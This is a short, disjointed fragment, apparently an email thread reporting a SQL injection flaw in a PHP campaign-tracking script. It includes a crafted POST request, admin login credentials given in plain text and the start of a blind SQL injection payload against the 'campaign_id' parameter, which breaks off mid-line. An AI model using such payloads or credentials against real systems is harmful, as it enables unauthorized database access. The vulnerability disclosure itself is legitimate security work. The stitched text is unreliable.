Hi Guy
This is indeed a valid vulnerability.
If we take the following request:
POST /trk/lpg/index.php HTTP/1.1
Host: myimg.co
Cookie: PHPSESSID=yourID
from_date=2013-05-21&to_date=2013-05-23&campaign_id=11'5*CA-PTV*Keyword*&crap=&submit=submit&stage=2
Then we receive a response which
My script is installed on http://myimg.co/trk/lpg/
login " admin ", password " hello "
A security advisor told me that it's injectable while being logged in
manually by modifying the POST param "campaign_id"
Example:
Change " 129*US-LP-PPV*PPV* " to :
129 and ascii(substring((SELECT datab
